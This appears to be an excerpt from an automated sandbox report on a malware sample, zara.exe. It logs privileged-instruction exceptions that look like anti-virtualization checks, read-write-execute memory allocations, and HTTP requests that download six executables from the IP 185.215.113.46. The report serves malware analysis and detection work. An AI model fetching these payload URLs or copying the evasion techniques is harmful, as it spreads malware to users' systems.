__exception__ Feb. 13, 2024, 12:17 p.m.	stacktrace: exception.instruction_r: fb 55 89 e5 50 b8 bf 41 dc 3f 25 3b 25 f9 1f e9 exception.symbol: zara+0x2c174e exception.instruction: sti exception.module: zara.exe exception.exception_code: 0xc0000096 exception.offset: 2889550 exception.address: 0x3c174e registers.esp: 9895160 registers.edi: 1761541656 registers.eax: 29940 registers.ebp: 3992428564 registers.edx: 134889 registers.ebx: 3938662 registers.esi: 0 registers.ecx: 0	1
__exception__ Feb. 13, 2024, 12:17 p.m.	stacktrace: exception.instruction_r: fb 51 89 2c 24 51 57 e9 7e 01 00 00 01 c2 ff 34 exception.symbol: zara+0x2c8071 exception.instruction: sti exception.module: zara.exe exception.exception_code: 0xc0000096 exception.offset: 2916465 exception.address: 0x3c8071 registers.esp: 9895156 registers.edi: 12266902 registers.eax: 29669 registers.ebp: 3992428564 registers.edx: 134889 registers.ebx: 1038304630 registers.esi: 0 registers.ecx: 3964013	1
__exception__ Feb. 13, 2024, 12:17 p.m.	stacktrace: exception.instruction_r: fb 29 ff ff 34 39 53 bb b5 1a d3 7b 29 5c 24 04 exception.symbol: zara+0x2c7ff9 exception.instruction: sti exception.module: zara.exe exception.exception_code: 0xc0000096 exception.offset: 2916345 exception.address: 0x3c7ff9 registers.esp: 9895160 registers.edi: 12266902 registers.eax: 29669 registers.ebp: 3992428564 registers.edx: 134889 registers.ebx: 1038304630 registers.esi: 0 registers.ecx: 3993682	1
__exception__ Feb. 13, 2024, 12:17 p.m.	stacktrace: exception.instruction_r: fb 57 e9 3b 00 00 00 bf b6 08 ce 7e 89 f9 e9 91 exception.symbol: zara+0x2c81f4 exception.instruction: sti exception.module: zara.exe exception.exception_code: 0xc0000096 exception.offset: 2916852 exception.address: 0x3c81f4 registers.esp: 9895160 registers.edi: 4294940148 registers.eax: 29669 registers.ebp: 3992428564 registers.edx: 134889 registers.ebx: 1114345 registers.esi: 0 registers.ecx: 3993682	1
__exception__ Feb. 13, 2024, 12:17 p.m.	stacktrace: exception.instruction_r: ed 64 8f 05 00 00 00 00 e9 bb 13 00 00 01 6c 24 exception.symbol: zara+0x2ca1dc exception.instruction: in eax, dx exception.module: zara.exe exception.exception_code: 0xc0000096 exception.offset: 2925020 exception.address: 0x3ca1dc registers.esp: 9895152 registers.edi: 4294940148 registers.eax: 1447909480 registers.ebp: 3992428564 registers.edx: 22104 registers.ebx: 1969033397 registers.esi: 3970698 registers.ecx: 20	1
__exception__ Feb. 13, 2024, 12:17 p.m.	stacktrace: exception.instruction_r: 0f 3f 07 0b 64 8f 05 00 00 00 00 83 c4 04 83 fb exception.symbol: zara+0x2c9cdd exception.address: 0x3c9cdd exception.module: zara.exe exception.exception_code: 0xc000001d exception.offset: 2923741 registers.esp: 9895152 registers.edi: 4294940148 registers.eax: 1 registers.ebp: 3992428564 registers.edx: 22104 registers.ebx: 0 registers.esi: 3970698 registers.ecx: 20	1
__exception__ Feb. 13, 2024, 12:17 p.m.	stacktrace: exception.instruction_r: ed 81 fb 68 58 4d 56 75 0a c7 85 db 2b 2d 12 01 exception.symbol: zara+0x2cd51b exception.instruction: in eax, dx exception.module: zara.exe exception.exception_code: 0xc0000096 exception.offset: 2938139 exception.address: 0x3cd51b registers.esp: 9895152 registers.edi: 4294940148 registers.eax: 1447909480 registers.ebp: 3992428564 registers.edx: 22104 registers.ebx: 2256917605 registers.esi: 3970698 registers.ecx: 10	1
__exception__ Feb. 13, 2024, 12:17 p.m.	stacktrace: exception.instruction_r: fb e9 ab ff ff ff 5b 8b 34 24 83 ec 04 e9 11 01 exception.symbol: zara+0x2d2606 exception.instruction: sti exception.module: zara.exe exception.exception_code: 0xc0000096 exception.offset: 2958854 exception.address: 0x3d2606 registers.esp: 9895160 registers.edi: 4294940148 registers.eax: 32501 registers.ebp: 3992428564 registers.edx: 4038380 registers.ebx: 38461640 registers.esi: 10 registers.ecx: 2123366400	1
__exception__ Feb. 13, 2024, 12:17 p.m.	stacktrace: exception.instruction_r: fb 50 c7 04 24 e4 4e 6f 7d 81 0c 24 ec 1c fb 76 exception.symbol: zara+0x2d212c exception.instruction: sti exception.module: zara.exe exception.exception_code: 0xc0000096 exception.offset: 2957612 exception.address: 0x3d212c registers.esp: 9895160 registers.edi: 4294940148 registers.eax: 32501 registers.ebp: 3992428564 registers.edx: 4038380 registers.ebx: 38461640 registers.esi: 6379 registers.ecx: 4294937668	1
__exception__ Feb. 13, 2024, 12:17 p.m.	stacktrace: exception.instruction_r: cd 01 eb 00 66 81 e6 36 0b e9 14 00 00 00 00 6a exception.symbol: zara+0x2d2f9f exception.instruction: int 1 exception.module: zara.exe exception.exception_code: 0xc0000005 exception.offset: 2961311 exception.address: 0x3d2f9f registers.esp: 9895120 registers.edi: 0 registers.eax: 9895120 registers.ebp: 3992428564 registers.edx: 3597717690 registers.ebx: 4010083 registers.esi: 1078206791 registers.ecx: 697553712	1
__exception__ Feb. 13, 2024, 12:17 p.m.	stacktrace: exception.instruction_r: fb 50 b8 0d cd 7d 79 81 c6 67 10 d6 1c 29 c6 e9 exception.symbol: zara+0x2d9760 exception.instruction: sti exception.module: zara.exe exception.exception_code: 0xc0000096 exception.offset: 2987872 exception.address: 0x3d9760 registers.esp: 9895156 registers.edi: 4294940148 registers.eax: 31782 registers.ebp: 3992428564 registers.edx: 654654 registers.ebx: 242352640 registers.esi: 4036019 registers.ecx: 4020260	1
__exception__ Feb. 13, 2024, 12:17 p.m.	stacktrace: exception.instruction_r: fb 83 ec 04 89 1c 24 52 c7 04 24 45 99 ce 3f 68 exception.symbol: zara+0x2da06f exception.instruction: sti exception.module: zara.exe exception.exception_code: 0xc0000096 exception.offset: 2990191 exception.address: 0x3da06f registers.esp: 9895160 registers.edi: 4294940148 registers.eax: 604292944 registers.ebp: 3992428564 registers.edx: 4294938336 registers.ebx: 242352640 registers.esi: 4067801 registers.ecx: 4020260	1
__exception__ Feb. 13, 2024, 12:17 p.m.	stacktrace: exception.instruction_r: fb 81 ef 04 98 a8 79 81 ef ee a4 fa 7f 03 3c 24 exception.symbol: zara+0x2e2b44 exception.instruction: sti exception.module: zara.exe exception.exception_code: 0xc0000096 exception.offset: 3025732 exception.address: 0x3e2b44 registers.esp: 9895156 registers.edi: 4072044 registers.eax: 25236 registers.ebp: 3992428564 registers.edx: 6 registers.ebx: 38461862 registers.esi: 1968968720 registers.ecx: 0	1
__exception__ Feb. 13, 2024, 12:17 p.m.	stacktrace: exception.instruction_r: fb 53 e9 f6 fe ff ff bd 1b f0 c6 3e 81 f5 af 6e exception.symbol: zara+0x2e2475 exception.instruction: sti exception.module: zara.exe exception.exception_code: 0xc0000096 exception.offset: 3023989 exception.address: 0x3e2475 registers.esp: 9895160 registers.edi: 4074700 registers.eax: 25236 registers.ebp: 3992428564 registers.edx: 0 registers.ebx: 316137 registers.esi: 1968968720 registers.ecx: 0	1
__exception__ Feb. 13, 2024, 12:17 p.m.	stacktrace: exception.instruction_r: fb 52 ba 9a 92 dc 3d 01 d7 5a 53 e9 00 00 00 00 exception.symbol: zara+0x2e5edd exception.instruction: sti exception.module: zara.exe exception.exception_code: 0xc0000096 exception.offset: 3038941 exception.address: 0x3e5edd registers.esp: 9895156 registers.edi: 4084666 registers.eax: 27330 registers.ebp: 3992428564 registers.edx: 1690362774 registers.ebx: 1183282891 registers.esi: 1968968720 registers.ecx: 1690362774	1
__exception__ Feb. 13, 2024, 12:17 p.m.	stacktrace: exception.instruction_r: fb 55 53 bb 49 9d ef 4f 50 68 31 66 ff 4a 58 56 exception.symbol: zara+0x2e5c3d exception.instruction: sti exception.module: zara.exe exception.exception_code: 0xc0000096 exception.offset: 3038269 exception.address: 0x3e5c3d registers.esp: 9895160 registers.edi: 4087652 registers.eax: 27330 registers.ebp: 3992428564 registers.edx: 0 registers.ebx: 1183282891 registers.esi: 1968968720 registers.ecx: 262633	1
__exception__ Feb. 13, 2024, 12:17 p.m.	stacktrace: exception.instruction_r: fb 53 bb 00 7d db 6b 01 de e9 16 fa ff ff 8b 14 exception.symbol: zara+0x2e8d80 exception.instruction: sti exception.module: zara.exe exception.exception_code: 0xc0000096 exception.offset: 3050880 exception.address: 0x3e8d80 registers.esp: 9895148 registers.edi: 4087652 registers.eax: 30882 registers.ebp: 3992428564 registers.edx: 42631529 registers.ebx: 414540986 registers.esi: 4097222 registers.ecx: 262633	1
__exception__ Feb. 13, 2024, 12:17 p.m.	stacktrace: exception.instruction_r: fb 68 25 c1 89 67 89 1c 24 bb d4 fa 77 77 53 f7 exception.symbol: zara+0x2e8bd6 exception.instruction: sti exception.module: zara.exe exception.exception_code: 0xc0000096 exception.offset: 3050454 exception.address: 0x3e8bd6 registers.esp: 9895152 registers.edi: 4087652 registers.eax: 0 registers.ebp: 3992428564 registers.edx: 2298801283 registers.ebx: 414540986 registers.esi: 4100028 registers.ecx: 262633	1
__exception__ Feb. 13, 2024, 12:17 p.m.	stacktrace: exception.instruction_r: fb 53 bb 0a 5a b6 5e 81 f3 a2 ac ff 7f 81 eb 66 exception.symbol: zara+0x2f628f exception.instruction: sti exception.module: zara.exe exception.exception_code: 0xc0000096 exception.offset: 3105423 exception.address: 0x3f628f registers.esp: 9895148 registers.edi: 0 registers.eax: 27233 registers.ebp: 3992428564 registers.edx: 2130566132 registers.ebx: 4008813 registers.esi: 4152229 registers.ecx: 377367406	1
__exception__ Feb. 13, 2024, 12:17 p.m.	stacktrace: exception.instruction_r: fb 56 c7 04 24 92 82 fc 77 c1 2c 24 06 c1 2c 24 exception.symbol: zara+0x2f5c5e exception.instruction: sti exception.module: zara.exe exception.exception_code: 0xc0000096 exception.offset: 3103838 exception.address: 0x3f5c5e registers.esp: 9895152 registers.edi: 116969 registers.eax: 27233 registers.ebp: 3992428564 registers.edx: 2130566132 registers.ebx: 4008813 registers.esi: 4179462 registers.ecx: 4294942508	1
__exception__ Feb. 13, 2024, 12:17 p.m.	stacktrace: exception.instruction_r: fb 83 ec 04 89 34 24 56 e9 00 00 00 00 89 1c 24 exception.symbol: zara+0x308f8e exception.instruction: sti exception.module: zara.exe exception.exception_code: 0xc0000096 exception.offset: 3182478 exception.address: 0x408f8e registers.esp: 9895120 registers.edi: 2179434839 registers.eax: 4233795 registers.ebp: 3992428564 registers.edx: 0 registers.ebx: 2800074652 registers.esi: 2804295175 registers.ecx: 2134794892	1
__exception__ Feb. 13, 2024, 12:17 p.m.	stacktrace: exception.instruction_r: fb 51 b9 d4 4f c5 26 81 e9 90 1f d2 00 29 cf ff exception.symbol: zara+0x309c59 exception.instruction: sti exception.module: zara.exe exception.exception_code: 0xc0000096 exception.offset: 3185753 exception.address: 0x409c59 registers.esp: 9895116 registers.edi: 4234167 registers.eax: 26257 registers.ebp: 3992428564 registers.edx: 125510196 registers.ebx: 2800074652 registers.esi: 2804295175 registers.ecx: 75087593	1
__exception__ Feb. 13, 2024, 12:17 p.m.	stacktrace: exception.instruction_r: fb 56 e9 33 00 00 00 ff 34 24 8b 04 24 e9 6c fb exception.symbol: zara+0x30a311 exception.instruction: sti exception.module: zara.exe exception.exception_code: 0xc0000096 exception.offset: 3187473 exception.address: 0x40a311 registers.esp: 9895120 registers.edi: 4236896 registers.eax: 26257 registers.ebp: 3992428564 registers.edx: 1459645024 registers.ebx: 2800074652 registers.esi: 0 registers.ecx: 75087593	1
__exception__ Feb. 13, 2024, 12:17 p.m.	stacktrace: exception.instruction_r: fb 31 c0 ff 34 38 e9 94 01 00 00 53 89 e3 81 c3 exception.symbol: zara+0x30defb exception.instruction: sti exception.module: zara.exe exception.exception_code: 0xc0000096 exception.offset: 3202811 exception.address: 0x40defb registers.esp: 9895120 registers.edi: 4281857 registers.eax: 31628 registers.ebp: 3992428564 registers.edx: 1711528498 registers.ebx: 4257761 registers.esi: 3992431828 registers.ecx: 1715776979	1
__exception__ Feb. 13, 2024, 12:17 p.m.	stacktrace: exception.instruction_r: fb 57 81 ec 04 00 00 00 89 34 24 e9 2a 00 00 00 exception.symbol: zara+0x30dc90 exception.instruction: sti exception.module: zara.exe exception.exception_code: 0xc0000096 exception.offset: 3202192 exception.address: 0x40dc90 registers.esp: 9895120 registers.edi: 4281857 registers.eax: 4294938404 registers.ebp: 3992428564 registers.edx: 1711528498 registers.ebx: 4257761 registers.esi: 3992431828 registers.ecx: 3633079904	1
__exception__ Feb. 13, 2024, 12:17 p.m.	stacktrace: exception.instruction_r: fb 81 e9 27 33 ee 5d e9 6b fe ff ff 87 04 24 5c exception.symbol: zara+0x30ee0a exception.instruction: sti exception.module: zara.exe exception.exception_code: 0xc0000096 exception.offset: 3206666 exception.address: 0x40ee0a registers.esp: 9895116 registers.edi: 140808228 registers.eax: 32209 registers.ebp: 3992428564 registers.edx: 1995692858 registers.ebx: 1995641128 registers.esi: 4252996 registers.ecx: 4254290	1
__exception__ Feb. 13, 2024, 12:17 p.m.	stacktrace: exception.instruction_r: fb e9 34 02 00 00 89 e5 81 c5 04 00 00 00 81 ed exception.symbol: zara+0x30f043 exception.instruction: sti exception.module: zara.exe exception.exception_code: 0xc0000096 exception.offset: 3207235 exception.address: 0x40f043 registers.esp: 9895120 registers.edi: 140808228 registers.eax: 32209 registers.ebp: 3992428564 registers.edx: 2179107154 registers.ebx: 0 registers.esi: 4252996 registers.ecx: 4256979	1
__exception__ Feb. 13, 2024, 12:17 p.m.	stacktrace: exception.instruction_r: fb 83 ec 04 89 14 24 e9 02 ff ff ff 89 14 24 ba exception.symbol: zara+0x314992 exception.instruction: sti exception.module: zara.exe exception.exception_code: 0xc0000096 exception.offset: 3230098 exception.address: 0x414992 registers.esp: 9895120 registers.edi: 140808228 registers.eax: 4306216 registers.ebp: 3992428564 registers.edx: 0 registers.ebx: 2411087 registers.esi: 140934060 registers.ecx: 1971716238	1
__exception__ Feb. 13, 2024, 12:17 p.m.	stacktrace: exception.instruction_r: fb 52 89 0c 24 e9 fa 02 00 00 89 e1 e9 88 03 00 exception.symbol: zara+0x314723 exception.instruction: sti exception.module: zara.exe exception.exception_code: 0xc0000096 exception.offset: 3229475 exception.address: 0x414723 registers.esp: 9895120 registers.edi: 140808228 registers.eax: 4306216 registers.ebp: 3992428564 registers.edx: 0 registers.ebx: 2411087 registers.esi: 24811 registers.ecx: 4294941776	1
__exception__ Feb. 13, 2024, 12:17 p.m.	stacktrace: exception.instruction_r: fb 53 c7 04 24 e3 8e f6 7b e9 24 fc ff ff 81 eb exception.symbol: zara+0x317683 exception.instruction: sti exception.module: zara.exe exception.exception_code: 0xc0000096 exception.offset: 3241603 exception.address: 0x417683 registers.esp: 9895116 registers.edi: 140808228 registers.eax: 25532 registers.ebp: 3992428564 registers.edx: 0 registers.ebx: 1037717569 registers.esi: 24811 registers.ecx: 4287780	1
__exception__ Feb. 13, 2024, 12:17 p.m.	stacktrace: exception.instruction_r: fb 68 e2 01 ae 3a 89 14 24 89 04 24 e9 d3 01 00 exception.symbol: zara+0x3172de exception.instruction: sti exception.module: zara.exe exception.exception_code: 0xc0000096 exception.offset: 3240670 exception.address: 0x4172de registers.esp: 9895120 registers.edi: 140808228 registers.eax: 25532 registers.ebp: 3992428564 registers.edx: 0 registers.ebx: 1037717569 registers.esi: 24811 registers.ecx: 4313312	1
__exception__ Feb. 13, 2024, 12:17 p.m.	stacktrace: exception.instruction_r: fb 68 d8 42 75 5e 89 04 24 89 14 24 ba 83 cc fe exception.symbol: zara+0x3176ac exception.instruction: sti exception.module: zara.exe exception.exception_code: 0xc0000096 exception.offset: 3241644 exception.address: 0x4176ac registers.esp: 9895120 registers.edi: 140808228 registers.eax: 25532 registers.ebp: 3992428564 registers.edx: 0 registers.ebx: 605849937 registers.esi: 24811 registers.ecx: 4290688	1
__exception__ Feb. 13, 2024, 12:17 p.m.	stacktrace: exception.instruction_r: fb 53 e9 18 01 00 00 55 bd 04 00 00 00 81 c3 c6 exception.symbol: zara+0x317be3 exception.instruction: sti exception.module: zara.exe exception.exception_code: 0xc0000096 exception.offset: 3242979 exception.address: 0x417be3 registers.esp: 9895120 registers.edi: 140808228 registers.eax: 4321696 registers.ebp: 3992428564 registers.edx: 1625434670 registers.ebx: 1566871239 registers.esi: 24811 registers.ecx: 1664077369	1
__exception__ Feb. 13, 2024, 12:17 p.m.	stacktrace: exception.instruction_r: fb 52 57 e9 60 01 00 00 f7 de 51 b9 00 00 00 00 exception.symbol: zara+0x317f96 exception.instruction: sti exception.module: zara.exe exception.exception_code: 0xc0000096 exception.offset: 3243926 exception.address: 0x417f96 registers.esp: 9895120 registers.edi: 140808228 registers.eax: 4293980 registers.ebp: 3992428564 registers.edx: 0 registers.ebx: 1566871239 registers.esi: 3233245264 registers.ecx: 1664077369	1
__exception__ Feb. 13, 2024, 12:17 p.m.	stacktrace: exception.instruction_r: fb e9 92 fa ff ff 29 74 24 04 e9 c0 00 00 00 57 exception.symbol: zara+0x32af1e exception.instruction: sti exception.module: zara.exe exception.exception_code: 0xc0000096 exception.offset: 3321630 exception.address: 0x42af1e registers.esp: 9895120 registers.edi: 4347898 registers.eax: 26634 registers.ebp: 3992428564 registers.edx: 2130566132 registers.ebx: 1971716070 registers.esi: 9945352 registers.ecx: 4394993	1
__exception__ Feb. 13, 2024, 12:17 p.m.	stacktrace: exception.instruction_r: fb 68 0b 62 b2 16 89 14 24 81 ec 04 00 00 00 89 exception.symbol: zara+0x32a9f2 exception.instruction: sti exception.module: zara.exe exception.exception_code: 0xc0000096 exception.offset: 3320306 exception.address: 0x42a9f2 registers.esp: 9895120 registers.edi: 23390546 registers.eax: 26634 registers.ebp: 3992428564 registers.edx: 2130566132 registers.ebx: 4294943972 registers.esi: 9945352 registers.ecx: 4394993	1
__exception__ Feb. 13, 2024, 12:17 p.m.	stacktrace: exception.instruction_r: fb 83 ec 04 89 04 24 b8 f1 b3 f7 5f 35 2e 65 88 exception.symbol: zara+0x3374ab exception.instruction: sti exception.module: zara.exe exception.exception_code: 0xc0000096 exception.offset: 3372203 exception.address: 0x4374ab registers.esp: 9895116 registers.edi: 4384448 registers.eax: 28153 registers.ebp: 3992428564 registers.edx: 4419283 registers.ebx: 4384416 registers.esi: 4384412 registers.ecx: 2123366400	1
__exception__ Feb. 13, 2024, 12:17 p.m.	stacktrace: exception.instruction_r: fb e9 62 ff ff ff 5f 81 ec 04 00 00 00 e9 4c 01 exception.symbol: zara+0x3375af exception.instruction: sti exception.module: zara.exe exception.exception_code: 0xc0000096 exception.offset: 3372463 exception.address: 0x4375af registers.esp: 9895120 registers.edi: 4294942244 registers.eax: 28153 registers.ebp: 3992428564 registers.edx: 4447436 registers.ebx: 4384416 registers.esi: 889147474 registers.ecx: 2123366400	1
__exception__ Feb. 13, 2024, 12:17 p.m.	stacktrace: exception.instruction_r: fb 55 e9 df fc ff ff 81 c3 4f 76 c7 de 81 c1 53 exception.symbol: zara+0x33d545 exception.instruction: sti exception.module: zara.exe exception.exception_code: 0xc0000096 exception.offset: 3396933 exception.address: 0x43d545 registers.esp: 9895116 registers.edi: 4423652 registers.eax: 27802 registers.ebp: 3992428564 registers.edx: 8381064 registers.ebx: 4443503 registers.esi: 889147474 registers.ecx: 2123366400	1
__exception__ Feb. 13, 2024, 12:17 p.m.	stacktrace: exception.instruction_r: fb 55 89 0c 24 83 ec 04 e9 10 00 00 00 bf 04 00 exception.symbol: zara+0x33d598 exception.instruction: sti exception.module: zara.exe exception.exception_code: 0xc0000096 exception.offset: 3397016 exception.address: 0x43d598 registers.esp: 9895120 registers.edi: 0 registers.eax: 27802 registers.ebp: 3992428564 registers.edx: 604292945 registers.ebx: 4446321 registers.esi: 889147474 registers.ecx: 2123366400	1
__exception__ Feb. 13, 2024, 12:17 p.m.	stacktrace: exception.instruction_r: fb 52 56 e9 3b fe ff ff 89 1c 24 56 c7 04 24 00 exception.symbol: zara+0x3465d8 exception.instruction: sti exception.module: zara.exe exception.exception_code: 0xc0000096 exception.offset: 3433944 exception.address: 0x4465d8 registers.esp: 9895116 registers.edi: 48201 registers.eax: 27307 registers.ebp: 3992428564 registers.edx: 4294951176 registers.ebx: 4460116 registers.esi: 9945352 registers.ecx: 4481566	1

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (12 events)

suspicious_features	Connection to IP address	suspicious_request	HEAD http://185.215.113.46/cost/fu.exe
suspicious_features	Connection to IP address	suspicious_request	GET http://185.215.113.46/cost/fu.exe
suspicious_features	Connection to IP address	suspicious_request	HEAD http://185.215.113.46/mine/amert.exe
suspicious_features	Connection to IP address	suspicious_request	GET http://185.215.113.46/mine/amert.exe
suspicious_features	Connection to IP address	suspicious_request	HEAD http://185.215.113.46/cost/niks.exe
suspicious_features	Connection to IP address	suspicious_request	GET http://185.215.113.46/cost/niks.exe
suspicious_features	Connection to IP address	suspicious_request	HEAD http://185.215.113.46/mine/plaza.exe
suspicious_features	Connection to IP address	suspicious_request	GET http://185.215.113.46/mine/plaza.exe
suspicious_features	Connection to IP address	suspicious_request	HEAD http://185.215.113.46/cost/ladas.exe
suspicious_features	Connection to IP address	suspicious_request	GET http://185.215.113.46/cost/ladas.exe
suspicious_features	Connection to IP address	suspicious_request	HEAD http://185.215.113.46/cost/well.exe
suspicious_features	Connection to IP address	suspicious_request	GET http://185.215.113.46/cost/well.exe

Performs some HTTP requests (24 events)

request	GET http://www.maxmind.com/geoip/v2.1/city/me
request	HEAD http://185.215.113.46/cost/fu.exe
request	GET http://185.215.113.46/cost/fu.exe
request	HEAD http://185.215.113.46/mine/amert.exe
request	GET http://185.215.113.46/mine/amert.exe
request	HEAD http://185.215.113.46/cost/niks.exe
request	GET http://185.215.113.46/cost/niks.exe
request	HEAD http://185.215.113.46/mine/plaza.exe
request	GET http://185.215.113.46/mine/plaza.exe
request	HEAD http://185.215.113.46/cost/ladas.exe
request	GET http://185.215.113.46/cost/ladas.exe
request	HEAD http://185.215.113.46/cost/well.exe
request	GET http://185.215.113.46/cost/well.exe
request	GET http://ie9cvlist.ie.microsoft.com/IE9CompatViewList.xml
request	GET https://db-ip.com/demo/home.php?s=175.208.134.152
request	GET https://accounts.google.com/
request	GET https://accounts.google.com/ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F
request	GET https://accounts.google.com/InteractiveLogin?continue=https://accounts.google.com/&followup=https://accounts.google.com/&passive=1209600&ifkv=ATuJsjz1jNrnusPHoH00gbZqw6mE-DeEWeVkSHkidM4bezlAO-nQqakY6wUDnxEten9xAtkD9mI5JA
request	GET https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=ATuJsjz5a8TlhvoYLJ0SzuAenpnz_UzZtCBVM8qDJPb2lw0Iee6PefsZ8BckMzAAvxq2SKM34ODzrA&passive=1209600&flowName=WebLiteSignIn&flowEntry=ServiceLogin&dsh=S-1878625607%3A1707794388790457
request	GET https://accounts.google.com/_/bscframe
request	GET https://ssl.gstatic.com/images/branding/googlelogo/2x/googlelogo_color_74x24dp.png
request	GET https://accounts.google.com/favicon.ico
request	GET https://accounts.google.com/generate_204?_hL20w
request	GET https://www.google.com/favicon.ico

Allocates read-write-execute memory (usually to unpack itself) (50 out of 2024 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Feb. 13, 2024, 12:17 p.m.	process_identifier: 2544 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76faf000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 13, 2024, 12:17 p.m.	process_identifier: 2544 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76f20000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Feb. 13, 2024, 12:17 p.m.	process_identifier: 2544 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 585728 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00101000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 13, 2024, 12:17 p.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 13, 2024, 12:17 p.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00af0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 13, 2024, 12:17 p.m.	process_identifier: 2544 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 13, 2024, 12:17 p.m.	process_identifier: 2544 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 13, 2024, 12:17 p.m.	process_identifier: 2544 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00b60000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 13, 2024, 12:17 p.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02490000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 13, 2024, 12:17 p.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02760000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 13, 2024, 12:17 p.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02770000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 13, 2024, 12:17 p.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02780000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 13, 2024, 12:17 p.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02790000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 13, 2024, 12:17 p.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 13, 2024, 12:17 p.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 13, 2024, 12:17 p.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028c0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 13, 2024, 12:17 p.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028d0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 13, 2024, 12:17 p.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 13, 2024, 12:17 p.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x028f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Feb. 13, 2024, 12:17 p.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02980000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
